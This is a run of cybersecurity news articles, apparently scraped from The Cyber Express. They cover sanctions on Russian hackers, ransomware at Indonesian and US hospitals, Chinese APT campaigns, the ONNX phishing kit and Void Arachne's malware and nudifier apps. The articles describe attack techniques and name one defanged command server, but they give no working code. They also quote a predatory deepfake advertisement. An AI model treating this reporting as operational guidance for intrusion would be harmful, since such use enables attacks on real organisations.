- Exercise caution with email attachments, especially from unknown senders.
- Limit execution of scripting languages where possible.
- Use application whitelisting to control which programs can run.
- Deploy robust antivirus and anti-malware solutions.
- Enforce strong, unique passwords and two-factor authentication.
- Monitor networks for unusual activity or data exfiltration attempts.
EU Issues New Sanctions Against Russia-Linked Threat Actors
Russian Military Intelligence and FSB Operative Sanctions
The sanctions will take effect following publication in the Official Journal of the European Union. The council document justified the new sanctions as measures in response to the ongoing war between Russia and Ukraine and its resulting cyber activities:The use of cyber operations that have enabled and accompanied Russia’s unprovoked and unjustified war of aggression against Ukraine affects global stability and security, represents an important risk of escalation, and adds to the already significant increase of malicious cyber activities outside the context of armed conflict over recent years. The growing cybersecurity risks and an overall complex cyber threat landscape, with a clear risk of rapid spill-over of cyber incidents from one Member State to others, and from third countries to the Union, further call for restrictive measures under Decision (CFSP) 2019/797.Among those sanctioned are Ruslan Aleksandrovich Peretyatko and Andrey Stanislavovich Korinets, both identified as members of the "Callisto group" linked to Russian military intelligence. The group, also known as "Seaborgium" or "Star Blizzard," is accused of conducting multi-year phishing campaigns to steal credentials and data, targeting individuals and critical state functions in defense and foreign relations. Two Ukrainian nationals, Oleksandr Sklianko and Mykola Chernykh, were sanctioned for their involvement in the "Armageddon" hacker group, allegedly supported by Russia's Federal Security Service (FSB). The group was found carrying out cyberattacks against the Ukrainian government and EU member states using phishing emails and malware campaigns.
Wizard Spider Threat Group Members Sanctioned
The EU also targeted two key players in the Russia-based threat group Wizard Spider: Mikhail Mikhailovich Tsarev and Maksim Sergeevich Galochkin. Both are implicated in deploying the "Conti" and "Trickbot" malware programs, which have caused substantial economic damage in the EU through ransomware campaigns targeting essential services such as healthcare, banking and defense. The EU Council has emphasized the need to protect these vital sectors from cyber threats, which can have devastating consequences for individuals, businesses, and societies as a whole. The Council said the sanctions imposed on these six individuals are a clear message that the EU will not tolerate malicious cyber activities that threaten its security, economy, and democracy. The Council document stated:"As part of the sustained, tailored and coordinated Union action against persistent cyber threat actors, six natural persons should be included in the list of natural and legal persons, entities and bodies subject to restrictive measures set out in the Annex to Decision (CFSP) 2019/797. Those persons are responsible for, or were involved in, cyberattacks with a significant effect, which constitute an external threat to the Union or its Member States."The sanctions demonstrate that the EU will continue to work closely with its Member States, international partners, and other stakeholders to address the growing cybersecurity threat landscape escalated by geopolitical tensions. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
- Cybersecurity News and Magazine
- Apple Fixes ‘Bug’ in Vision Pro That Allowed Hackers To Fill Room with Bugs And Spiders
Apple Fixes ‘Bug’ in Vision Pro That Allowed Hackers To Fill Room with Bugs And Spiders
Spatial Hack in Apple Vision Pro Devices
Apple designed the Vision Pro with strict privacy controls. This includes limiting device apps to a default 'Shared Space' and mandating explicit user consent for more engaging and immersive content. Websites must also obtain explicit user permission to generate 3D content within a user's physical environment. [caption id="attachment_78754" align="alignnone" width="720"] Source: ryanpickren.com[/caption] However, Pickren discovered that the AR Quick Look feature that had been introduced in 2018 for iOS remained active in the visionOS without the implementation of proper safeguards. This oversight allowed websites to manipulate HTML anchor tags to spawn unlimited 3D objects coupled with animations and spatial audio. By adding specific anchor tags to webpages, malicious websites can instruct Safari to render a 3D model, surprisingly without any form of user interaction. "If the victim just views our website in Vision Pro, we can instantly fill their room with hundreds of crawling spiders and screeching bats," Pickren explained. "Freaky stuff," he exclaimed. [caption id="attachment_78758" align="alignnone" width="1168"] Source: ryanpickren.com[/caption] [caption id="attachment_78756" align="alignnone" width="1186"] Source: ryanpickren.com[/caption] The researcher stated that the exploit code is straightforward and that closing Safari doesn't get rid of the 3D objects, as they are handled by a separate application. "To make things even freakier – since these animated files are being handled by a separate application (Quick Look), closing Safari does not get rid of them," Pickren noted. He added, "There is no obvious way to get rid of them besides manually running around the room to physically tap each one."Bug Reporting and Gaps in Vulnerability Assessment
After trying to disclose the flaw to Apple, the researcher felt the tech giant had downplayed its relation to spatial computing and the generation of 3D objects, instead focusing on the potential for system crashes and reboots. The CVE description claimed that the issue had been addressed by improving the file handling protocol, which the researcher believed was unrelated to the bug. This highlights the challenges of triaging and classifying bugs in emerging fields such as Spatial Computing. The researcher believes the bug's impact goes beyond simple system crashes or reboots, raising questions about the security and privacy of the technology and the need for reevaluating existing threat models. "Perhaps it's time for Apple to re-evaluate their Vision Pro threat model," Pickren suggested. "This is a deeply personal product and classic vulnerability triaging guidelines may not capture the full impact anymore." Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- Indonesia National Data Center Hack Disrupts Government Services, Affecting Over 200 Agencies
Indonesia National Data Center Hack Disrupts Government Services, Affecting Over 200 Agencies
Authorities Have Detected Samples of LockBit 3.0 Ransomware
Samuel Abrijani Pangerapan, director general of informatics applications at the Communications and Informatics Ministry, confirmed that essential services like immigration checks at airports had been disrupted. Long lines were formed at affected airports after automated passport machines were rendered useless. While some of these services have been restored, including the government's immigration services, ongoing efforts are aimed at restoring other critical operations, such as investment licensing. Samuel stated, “We have tried our best to carry out recovery while the (National Cyber and Crypto Agency) is currently carrying out forensics.” The National Cyber and Crypto Agency has detected samples of LockBit 3.0 ransomware, a variant known for encrypting victims' data and demanding payment for its release. PT Telkom Indonesia, an Indonesian multinational telecommunications company, is working with domestic and international authorities and leading the efforts to efforts to break the encryption and restore access to the compromised data. Herlan Wijanarko, the company's director of network & IT solutions, confirmed that the attackers had offered a decryption key in exchange for an $8 million ransom.Experts Concerned About Indonesia Government Infrastructure Security
Cybersecurity experts warn that the severity of the attack highlights significant vulnerabilities in the government's digital infrastructure and incident response capabilities. Cybersecurity expert Teguh Aprianto described the latest attack as "severe" and notes that it highlights the need for improved infrastructure, manpower, and vendor management to prevent such attacks in the future. Teguh stated, "It shows that the government infrastructure, manpower handling this and the vendors are all problematic." In recent years, Indonesia has faced a series of high-profile cyber attacks, including a ransomware attack on its central bank and a data breach at its largest Islamic lender. The consequences of these attacks can be severe, with victims often forced to pay large sums to regain access to their data. Last year, the LockBit ransomware gang claimed responsibility for an attack on the Bank Syariah Indonesia. Sensitive information of over 15 million individuals had been stolen in the attack, affecting both customers and employees. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.ANY.RUN Malware Sandbox Provider’s Employee Email Compromised
ANY.RUN Employee Email Compromise
[caption id="attachment_78600" align="alignnone" width="531"] Source: X.com (@anyrun_app)[/caption] According to a post on X from the company's official handle, the attack originated from a compromised customer account, which had been used to send a convincing phishing email to a staff member. This led to unauthorized access to the employee's email account. Subsequently, the attacker forwarded a phishing message to contacts within the compromised email address book. ANY.RUN stated that it had already notified data controllers of affected individuals and is working closely with them to address any concerns. They emphasized that the compromised employee did not have access to the production environment or any code base, which limits the potential scope of the breach.ANY.RUN Response and Next Steps
Upon discovery of the incident, ANY.RUN took steps to minimize possible compromise and share details about the incident. An ongoing investigation is being done to determine the full impact of the breach and gather additional details. While the comprehensive report, the company has assured its customers that they are taking the matter seriously. In the coming days and weeks, ANY.RUN would work to: 1. Continue their investigation and analysis of the incident 2. Provide regular updates on their progress 3. Compile a detailed report of their findings The company acknowledges that many questions remain unanswered at this stage. However, they are committed to keeping all parties informed throughout the process. Customers appear to have viewed the effort at communication positively, highlighting it as an example of transparency around cybersecurity incident reporting and disclosure. The incident serves as a stark reminder that even companies working in the cybersecurity industry remain a potential target for attacks. Last year, Okta, a provider of identity and access management software, had suffered a security incident in which attackers had managed to access its support incident management through the use of stolen credentials. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- UK’s Sellafield Nuclear Waste Site Pleads Guilty To Cybersecurity Failings
UK’s Sellafield Nuclear Waste Site Pleads Guilty To Cybersecurity Failings
Sellafield Nuclear Waste Site's Cybersecurity Failings
Concerns over the site's security implementations grew after a 2012 report warned of "critical security vulnerabilities" requiring urgent attention. Due to the extreme sensitivity of the issues, problems were referred to with the codename "Voldemort." While Sellafield stated there has never been a successful cyberattack, revelations of IT failures last year raised alarms. In an investigative report last year, the Guardian uncovered that the site had been attacked by threat actors affiliated with the Russian and Chinese governments. The report found out that the site's authorities were not aware of when Sellafield's systems began to be compromised, but breaches may have gone as far back as the year 2015. In 2015, security experts had realized that Sellafield's computer systems had been compromised by sleeper malware. Sellafield had been earlier forced into “special measures” for regular cybersecurity failings by the UK's Office for Nuclear Regulation (ONR) and security services. The status of the compromised systems are unknown, but may have possibly led to the theft of sensitive information regarding moving of radioactive waste, monitoring for leaks of dangerous material, and fire checks. Sellafield stated that current protections on critical systems are robust, with isolated networks preventing external IT breaches from penetrating operational controls. An ONR spokesperson stated to the Guardian: “We acknowledge that Sellafield Limited has pleaded guilty to all charges," but emphasized that there was no evidence the vulnerabilities led to compromise. A Sellafield spokesman stated in the report, “We have pleaded guilty to all charges and cooperated fully with ONR throughout this process. The charges relate to historic offences and there is no suggestion that public safety was compromised."Concerns of GMB Trade Union
With attention now focused on improving cyber resilience, officials are working to prevent sensitive materials or dangerous nuclear operations from potential disruption by hackers. Earlier the GMB trade union, which represents tens of thousands of workers across the energy industry, also expressed concerns over the security of Sellafield, with its national secretary Andy Prendergast noting a “lack of training and competence among staff, inadequate safety procedures and a culture of fear and intimidation.” Prendergast added, “GMB has repeatedly raised concerns over safety and staffing levels, which are mainly due to turnover and the age and demographic of the workforce.” Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- CDK Global Struck By Second Cyberattack While Investigating Incident
CDK Global Struck By Second Cyberattack While Investigating Incident
Incident Extends CDK Global Systems Outage
After the initial attack, CDK Global shut down most of its systems on Wednesday, while working to investigate the incident and restore systems. "We are actively investigating a cyber incident.," the company said. "Out of an abundance of caution and concern for our customers, we have shut down most of our systems and are working diligently to get everything up and running as quickly as possible.” Later on the same day, the software firm managed to restore systems involved with its core DMS and Digital Retailing activities. In a statement to the Cyber Express, a spokesman from CDK Global said:“As we’ve communicated previously, we are currently investigating a cyber incident. Erring on the side of caution, we proactively shut all systems down and executed extensive testing and consulted with external third-party experts. With the work done so far, our core DMS and Digital Retailing solutions have been restored. We are continuing to conduct extensive tests on all other applications, and we will provide updates as we bring those applications back online. Our first priority is always the security of our customers, and our actions reflect our obligation to them as a trusted partner.”However, this restoration was short-lived, as the firm experienced a subsequent cyberattack on the same day:
“Late in the evening of June 19, we experienced an additional cyber incident and proactively shut down most of our systems. In partnership with third party experts, we are assessing the impact and providing regular updates to our customers. We remain vigilant in our efforts to reinstate our services and get our dealers back to business as usual as quickly as possible.”According to CNN, sources appeared to confirm that the outage could last for several days in light of the second cyberattack. The CDK Global outage makes information related to sales deals, negotiations and customer appointments inaccessible by salespeople who work at affected dealerships.
Incident Comes Ahead of Summer Sales Season
The incident has caused concerns among dealers who anticipate business during the summer months. “This is where we need systems functioning,” stated Jeff Ramsey, an executive with Ourisman Auto Group which operates various dealerships. This had led to dealers switching to alternative methods to handle sales such as hand-written notes of buyer's orders. Brian Benstock, general manager of Paragon Honda and Paragon Acura, stated, “My selling team can hand-write a buyer’s order.” Companies such as Kia, Toyota and Stellantis and Ford have also been working on alternate ways to handle customer services due to the CDK outage. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- Cyberattack on Ascension Hospitals Led to Lapses in Patient Care Such As Wrongful Administration of Narcotics
Cyberattack on Ascension Hospitals Led to Lapses in Patient Care Such As Wrongful Administration of Narcotics
Ascension Hospitals Cyberattack Places Strain on Staff
"I had no training for this," said Marvin Ruckle, a neonatal ICU nurse at Ascension Via Christi St. Joseph in Wichita, Kansas, who nearly gave a baby the wrong dose of medication. Lisa Watson, a critical care nurse who works at the same hospital, says she almost administered the wrong drug to a critically ill patient because she couldn't scan it electronically. "My patient probably would have passed away," she said. Doctors and nurses across Ascension report relying on paper records, handwritten notes, faxes and basic spreadsheets to deliver care - many cobbled together in real time. An ER doctor in Detroit said a mix-up due to paperwork issues led a patient to receive the wrong narcotic and end up on a ventilator. In Baltimore, ICU nurse Melissa LaRue described narrowly avoiding giving an incorrect blood pressure medication dosage due to confusion from paperwork. Several clinicians said errors could threaten their licenses, but patient privacy laws prevented verifying their accounts. Ascension declined to address specific claims but said in a statement it is "confident that our care providers...continue to provide quality medical care."Ascension Hospitals' Staff Urge Changes
While federal regulations require safeguarding patient data, hospitals currently face no cyberattack preparation or prevention mandates. Experts regard health care as the top target for ransomware attacks, which are rising exponentially. Proposed regulations are pending, but timelines and requirements remain unclear. Nurses and doctors urging reforms at Ascension say cyberattacks should be treated similarly to natural disasters, with contingency plans that account for outages lasting weeks or longer. Many also echoed a plea for more staff support to shoulder the additional workload. "We implore Ascension," one Michigan clinician wrote, "to recognize the internal problems that continue to plague its hospitals, both publicly and privately, and take earnest steps toward improving working conditions for all of its staff." While the Biden administration has pushed for stronger cybersecurity standards in health care, the new requirements are still in development. Meanwhile, hospital industry lobbyists argue mandates could divert resources from cybersecurity efforts. These incidents prove that patients may ultimately pay the price when hospitals fall victim to cybercrime, while staff experience additional burden affecting routine practice and judgement. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- Association of Texas Professional Educators Reports Data Breach Affecting Over 414,000 Members
Association of Texas Professional Educators Reports Data Breach Affecting Over 414,000 Members
Association of Texas Professional Educators Data Breach
On February 12, 2024, ATPE detected abnormal activity on its network, which led to a comprehensive forensic investigation. The investigation concluded on March 20, 2024, and found evidence that some of ATPE's systems had been accessed by an unauthorized user. Based on this finding, ATPE reviewed the affected systems to identify the specific individuals and types of information that may have been compromised. The accessed information varied depending on when members joined:- For those who became members before May 15, 2021, the breach may have exposed names, addresses, dates of birth, Social Security numbers and medical records. Tax Identification Numbers could also possibly have been accessed if employers used them as identifiers.
- For members who received payments from ATPE via ACH transactions, financial account information could also have been accessed.
Response to Breach Incident and Credit Offering
Since discovery of the breach, ATPE stated that it has taken several steps to secure its systems, including:- Disconnecting all access to its network.
- Change of administrative credentials.
- Installation of enhanced security safeguards on ATPE's environment and endpoints.
- Restoration of ATPE's website in a Microsoft Azure hosted environment.
- Cybersecurity News and Magazine
- Several Chinese APTs Have Been Targeting Telecommunications of Asian Country Since 2021
Several Chinese APTs Have Been Targeting Telecommunications of Asian Country Since 2021
Malware Variants Used in Chinese Espionage Campaign
Researchers from Symantec observed the use of several custom malware linked to China-based threat actors, including:- Coolclient: A backdoor used by the Fireant group that logs keystrokes and communicates with command servers. The campaign utilized a version delivered via a trojanized VLC media player. It is linked to the Fireant group, also known as Mustang Panda or Earth Preta.
- Quickheal: A backdoor associated with the Needleminer group, also known as RedFoxtrot or Nomad Panda. The variant used in the campaign was nearly identical to those documented in 2021. It communicated with a command server at swiftandfast[.]net.
- Rainyday: A backdoor tied to the Firefly group, also known as Naikon. Multiple variants were deployed using trojanized executables to sideload malicious loaders and decrypt payloads. At least one loader variant matched those linked to Firefly in 2021.
Campaign Motives and Attribution
The custom malware exclusively used by Fireant, Needleminer and Firefly provides strong evidence that this campaign involves Chinese state-sponsored groups. Firefly has been linked to a Chinese military intelligence unit by the U.S.-China Commission. The level of coordination between the groups involved is unclear but possibilities include independent action, personnel/tool sharing, or active collaboration. The ultimate motives behind the hacking campaign remain uncertain. Potential objectives include intelligence gathering on the telecommunications sector, eavesdropping on voice and data communications, or developing disruptive capabilities against critical infrastructure. To protect against these threats, telecom operators and other organizations should ensure they have the latest protection updates and implement robust security measures to detect and block malicious files. The researchers shared several Indicators of compromise and file hashes to help defenders detect against the campaign. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- ONNX Store Phishing Kit Leverages QR Codes To Target Financial Sector
ONNX Store Phishing Kit Leverages QR Codes To Target Financial Sector
ONNX Store Enables Theft of Credentials in Real Time
[caption id="attachment_77987" align="alignnone" width="1179"] Source: blog.eclecticiq.com[/caption] ONNX Store offers a variety of powerful phishing tools designed to support cybercriminals, including custom phishing pages, webmail servers, 2FA cookie stealers, and "fully undetectable" referral services that use trusted domains to direct victims to phishing landing pages. Researchers from EclecticIQ have noticed that threat actors using the ONNX Store phishing kit tend to distribute PDF files as attachments in phishing emails. Impersonating a reputable service, these documents contain a QR code that directs victims to malicious phishing landing pages. This tactic, known as "quishing," takes advantage of the lack of detection or prevention present on employee's personal mobile devices, which are usually left unprotected. The lack of protection on mobile devices also makes it challenging to monitor these threats. The phishing landing pages aim to steal sensitive credentials using the Adversary-in-The-Middle (AiTM) method, which allows for real-time capture and transmission of stolen data without the need for frequent HTTP requests. This makes the phishing operation more efficient and harder to detect. The ONNX Store Phishing Kit uses encrypted JavaScript code that decrypts itself upon page load and includes a basic anti-JavaScript debugger. This adds a layer of protection against phishing scanners and complicates detection. The decrypted JavaScript code then collects the victims' network metadata, including details such as browser name, IP address, and location. The decrypted JavaScript code is designed to steal 2FA tokens entered by the victims. This allows attackers to bypass typical 2FA protection and gain unauthorized access to the victim's account before it expires. Researchers identified similarities in domain registrant and SSL issuer across various infrastructures deployed by the ONNX Store phishing kit. These similarities indicated the use of bulletproof hosting services to host the campaign.Researchers Believe ONNX Store is Rebranding of Caffeine Kit
Researchers have assessed that the ONNX Store phishing kit is likely a rebranding of the Caffeine phishing kit. This assessment is based on the significant overlaps in infrastructure and advertising on the same Telegram channels. This overlap includes the involvement of the Arabic-speaking threat actor MRxC0DER as the likely developer and maintainer behind the Caffeine kit. [caption id="attachment_77989" align="alignnone" width="1393"] Source: blog.eclecticiq.com[/caption] The rebranding of the platform appears to be focused on improving operational security for malicious actors. The ONNX Store service enables threat actors to control operations through Telegram bots with an additional support channel to assist clients rather than a single web server. This shift in infrastructure and management makes it more challenging to take down the platform's phishing domains. To further increase its resilience, ONNX Store uses Cloudflare services to delay the removal process of its phishing domains. This abuse of Cloudflare's CAPTCHA feature and IP proxy helps attackers avoid detection through the use of phishing web crawlers and URL sandboxes. This practice also hides the original host and makes it more difficult to take down phishing domains. Advertised with slogans like "Anything is allowed" and "Ignore all reports of abuse", these services are designed to support a wide range of illegal activities without the risk of being blocked, creating a safe haven for cybercriminals. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- New Threat Group Void Arachne Targets Chinese-Speaking Audience; Promotes AI Deepfake and Misuse
New Threat Group Void Arachne Targets Chinese-Speaking Audience; Promotes AI Deepfake and Misuse
Void Arachne Tactics
Researchers from Trend Micro discovered that the Void Arachne group employs multiple techniques to distribute malicious installers, including search engine optimization (SEO) poisoning and posting links on Chinese-language Telegram channels.- SEO Poisoning: The group set up websites posing as legitimate software download sites. Through SEO poisoning, they pushed these sites to rank highly on search engines for common Chinese software keywords. The sites host MSI installer files containing Winos malware bundled with software like Chrome, language packs, and VPNs. Victims unintentionally infect themselves with Winos, while believing that they are only installing intended software.
- Targeting VPNs: Void Arachne frequently targets Chinese VPN software in their installers and Telegram posts. Exploiting interest in VPNs is an effective infection tactic, as VPN usage is high among Chinese internet users due to government censorship. [caption id="attachment_77950" align="alignnone" width="917"] Source: trendmicro.com[/caption]
- Telegram Channels: In addition to SEO poisoning, Void Arachne shared malicious installers in Telegram channels focused on Chinese language and VPN topics. Channels with tens of thousands of users pinned posts with infected language packs and AI software installers, increasing exposure.
- Deepfake Pornography: A concerning discovery was the group promoting nudifier apps generating nonconsensual deepfake pornography. They advertised the ability to undress photos of classmates and colleagues, encouraging harassment and sextortion. Infected nudifier installers were pinned prominently in their Telegram channels.
- Face/Voice Swapping Apps: Void Arachne also advertised voice changing and face swapping apps enabling deception campaigns like virtual kidnappings. Attackers can use these apps to impersonate victims and pressure their families for ransom. As with nudifiers, infected voice/face swapper installers were shared widely on Telegram.
Winos 4.0 C&C Framework
The threat actors behind the campaign ultimately aim to install the Winos backdoor on compromised systems. Winos is a sophisticated Windows backdoor written in C++ that can fully take over infected machines. The initial infection begins with a stager module that decrypts malware configurations and downloads the main Winos payload. Campaign operations involve encrypted C&C communications that use generated session keys and a rolling XOR algorithm. The stager module then stores the full Winos module in the Windows registry and executes shellcode to launch it on affected systems. [caption id="attachment_77949" align="alignnone" width="699"] Source: trendmicro.com[/caption] Winos grants remote access, keylogging, webcam control, microphone recording, and distributed denial of service (DDoS) capabilities. It also performs system reconnaissance like registry checks, file searches, and process injection. The malware connects to a command and control server to receive further modules/plugins that expand functionality. Several of these external plugins were observed providing functions such as collecting saved passwords from programs like Chrome and QQ, deleting antivirus software and attaching themselves to startup folders.Concerning Trend of AI Misuse and Deepfakes
Void Arachne demonstrates technical sophistication and knowledge of effective infection tactics through their usage of SEO poisoning, Telegram channels, AI deepfakes, and voice/face swapping apps. One particularly concerning trend observed in the Void Arachne campaign is the mass proliferation of nudifier applications that use AI to create nonconsensual deepfake pornography. These images and videos are often used in sextortion schemes for further abuse, victim harassment, and financial gain. An English translation of a message advertising the usage of the nudifier AI uses the word "classmate," suggesting that one target market is minors:Just have appropriate entertainment and satisfy your own lustful desires. Do not send it to the other party or harass the other party. Once you call the police, you will be in constant trouble! AI takes off clothes, you give me photos and I will make pictures for you. Do you want to see the female classmate you yearn for, the female colleague you have a crush on, the relatives and friends you eat and live with at home? Do you want to see them naked? Now you can realize your dream, you can see them naked and lustful for a pack of cigarette money.[caption id="attachment_77953" align="alignnone" width="437"] Source: trendmicro.com[/caption] Additionally, the threat actors have advertised AI technologies that could be used for virtual kidnapping, a novel deception campaign that leverages AI voice-alternating technology to pressure victims into paying ransom. The promotion of this technology for deepfake nudes and virtual kidnapping is the latest example of the danger of AI misuse.
CISA Releases Guide on Modern Approaches to Network Access Security
Vulnerabilities in Traditional VPN Systems
CISA has identified several different vulnerabilities in legacy VPN systems can enable broad network compromise if exploited, given their typical lack of granular access controls. While VPNs provide ease of access for employees to connect to remote company applications and external data servers, they also make organizations more susceptible to compromise through various vulnerabilities inherent to typical network design. Recent examples of successful exploitation of VPNs include:- Vulnerabilities affecting Ivanti Connect Secure gateways (CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893) allowed threat actors to reverse tunnel from the VPN device, hijack sessions, and move laterally across victim networks while evading detection.
- The Citrix Bleed vulnerability (CVE-2023-4966) enabled bypassing of multifactor authentication, allowing threat actors to impersonate legitimate users, harvest credentials, and conduct ransomware attacks.
Modern Solutions to Network Access Security
Modern alternatives to VPN-based network access control includes zero trust architecture, SSE, SASE and identity-based adaptive access policies. These solutions provide access to applications and services based on continuous, granular validation of user identity and authorization - rejecting those not explicitly authenticated for specific resources. Zero Trust is a collection of different concepts and ideas that help organizations enforce accurate per-request access decisions based on the principles of least privilege. SSE is a comprehensive approach that combines networking, security practices, policies and services within a single platform. Key capabilities like multi-factor authentication, endpoint security validation, and activity monitoring better secure data in network transit while reducing attack surfaces. Tighter access controls also help secure data at rest by limiting exposure of internal applications. Effectiveness relies heavily on aligning network and infrastructure with zero trust principles like least privilege. Implementing zero trust even partially can greatly enhance protections against threats and data loss. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- ViLe: Two Men Plead Guilty For Hacking Into Law Enforcement Portal and Threatening Victim
ViLe: Two Men Plead Guilty For Hacking Into Law Enforcement Portal and Threatening Victim
Breach and Abuse of Federal Law Enforcement Portal
According to the press release, on May 7, 2022, Singh used a stolen password belonging to a police officer to access a non-public, password-protected federal law enforcement portal. The portal, maintained by the U.S. Drug Enforcement Administration (DEA), holds detailed records on narcotics and currency seizures as well as law enforcement intelligence reports with respective state and local agencies. [caption id="attachment_77700" align="alignnone" width="1954"] Source:archive.org[/caption] The next day, Singh told Ceraolo in an online chat that he shouldn’t have accessed the portal and was “no gov official.” Ceraolo then shared the stolen login credentials with others in the ViLe hacking group. Shortly after, Singh used the database to obtain personal information on an individual. He messaged the victim, referred to in court documents as Victim-1, threatening to harm their family if they did not provide login credentials to their Instagram accounts. To prove he had access to sensitive information, Singh included Victim-1’s Social Security number, driver’s license number and home address. He told Victim-1 that through the database portal, “i can request information on anyone in the US doesn’t matter who, nobody is safe.” Singh instructed Victim-1 to sell access to the Instagram accounts and give him the money. His messages implied he would use the information to harm Victim-1’s parents if demands were not met. [caption id="attachment_77699" align="alignnone" width="2186"] Source: dea.gov[/caption] While the court documents focus on the case of Victim-1, the duo also threatened other individuals whose information they had access to for financial gains. According to an earlier report from Vice, the portal that was used by the duo is the EPIC(El Paso Intelligence Center) Portal.Guilty Pleas Over Actions
Singh and Ceraolo were charged in March 2023 with computer intrusion conspiracy and aggravated identity theft. Singh pleaded guilty to both counts on June 17, while Ceraolo had done so May 30, the U.S. Attorney’s Office in the Eastern District of New York announced. U.S. Attorney Breon Peace condemned the men’s actions as “ViLe,” a reference to the hacking group’s disturbing logo depicting a hanging girl. He stated, “They hacked into a law enforcement database and had access to sensitive personal information, then threatened to harm a victim’s family and publicly release that information unless the defendants were ultimately paid money. Our Office is relentless in protecting victims from having their sensitive information stolen and used to extort them by cybercriminals.” He thanked the HSI's El Dorado Task Force, the Federal Bureau of Investigation and the New York Police Department for assistance in the case. HSI New York Special Agent in Charge Ivan J. Arvelo stated, “The defendants, along with their co-conspirators, exploited vulnerabilities within government databases for their own personal gain. These guilty pleas send a strong message to those that would seek illicit access to protected computer systems." He added, "HSI New York's El Dorado Task Force will continue to work with law enforcement partners to uncover evidence until every member of the ViLe group and similar criminal organizations are brought to justice.” The defendants face two to seven years in federal prison upon sentencing for the case in charges related to conspiring to commit computer intrusion and aggravated identify theft. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- NHS Dumfries and Galloway Warns Affected Individuals of Data Breach After Refusing to Pay Ransom to Cybercriminals
NHS Dumfries and Galloway Warns Affected Individuals of Data Breach After Refusing to Pay Ransom to Cybercriminals
NHS Dumfries and Galloway Breach
NHS Dumfries and Galloway’s computer systems were breached by hackers in February 2024. The threat actors had accessed and copied confidential patient data including X-rays, test results and communications between health care providers and patients. However, the stolen data had not been deleted or altered on NHS systems and patient care has not been impacted. [caption id="attachment_77683" align="alignnone" width="1084"] Source: nhsdg.co.uk[/caption] On May 6, the criminals made good on threats to publish the data online after NHS Dumfries and Galloway did not meet undisclosed demands. The leaked data includes millions of small, individual files on NHS patients. Authorities said they are prioritizing notifications to vulnerable patient groups that may be at higher risk due to the breach. The NHS Dumfries and Galloway has been working alongside national agencies like Police Scotland, The National Crime Agency, The National Cyber Security Centre and The Scottish Government for advice and direction in investigating the incident. "On behalf of NHS Dumfries and Galloway, I would like to apologise for the anxiety which may have been caused to you due to this situation. We have sought to be as open as possible while adhering to the very explicit guidance we have received from Police Scotland and partner agencies," stated Julie White, Chief Executive of NHS Dumfries and Galloway.Risks and Recommendations
The Chief Executive of NHS Dumfries and Galloway stated that patients should assume some personal data was likely copied and published. The health authority identified potential risks including identity theft, extortion attempts and anxiety stemming from the data breach. Patients are advised to remain vigilant. NHS recommends patients refrain from opening suspicious emails, clicking unknown links or providing personal information over the phone to unverified parties. Suspicious communications should be reported to Police Scotland immediately. The health authority also advises patients to frequently update passwords and to make them as strong as possible. A helpline and website have been set up to provide information and support relating to the cyber attack. Psychological services are available for those experiencing anxiety regarding stolen personal data. The criminal investigation remains ongoing alongside technology partners to secure NHS systems against future attacks. Patients with additional questions can visit www.nhsdg.co.uk/cyberattack or call the helpline at 01387 216 777, open 9 a.m. to 6 p.m. weekdays and 9 a.m. to 1 p.m. Saturdays. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- Chinese Hackers Compromised Large Organization’s F5 BIG-IP Systems for 3 Years
Chinese Hackers Compromised Large Organization’s F5 BIG-IP Systems for 3 Years
Velvet Ant Campaign Used Evasive Tactics
Researchers from Sygnia disclosed that the attack began with the compromise of the organization's internet-facing F5 BIG-IP appliances, which were running on vulnerable OS versions. These appliances usually occupy a trusted position within network architecture, allowing potential attackers significant control over network traffic while evading most forms of detection. These appliances were used within the organization to manage its firewall, WAF (web application firewall), load balancing, and local traffic . [caption id="attachment_77649" align="alignnone" width="1802"] Source: sygnia.co[/caption] The attackers used known remote code execution flaws to install custom malware on the compromised F5 appliances. To obscure the execution chain, the attackers manipulated file-creation times and used three different files (‘iviewers.exe’, ‘iviewers.dll’ and ‘iviewers.dll.ui’) for deployment of the PlugX malware on affected systems. Once installed, PlugX harvested credentials and executed reconnaissance commands to map the internal network. The hackers then used the open-source tool Impacket for lateral movement across the network. [caption id="attachment_77647" align="alignnone" width="1872"] Source: sygnia.co[/caption] During the initial compromise, the threat actor compromised both modern workstations and legacy Windows Server 2003 systems. On modern endpoints, the hackers routinely tampered with the installed antivirus prior to deploying additional tools. This careful 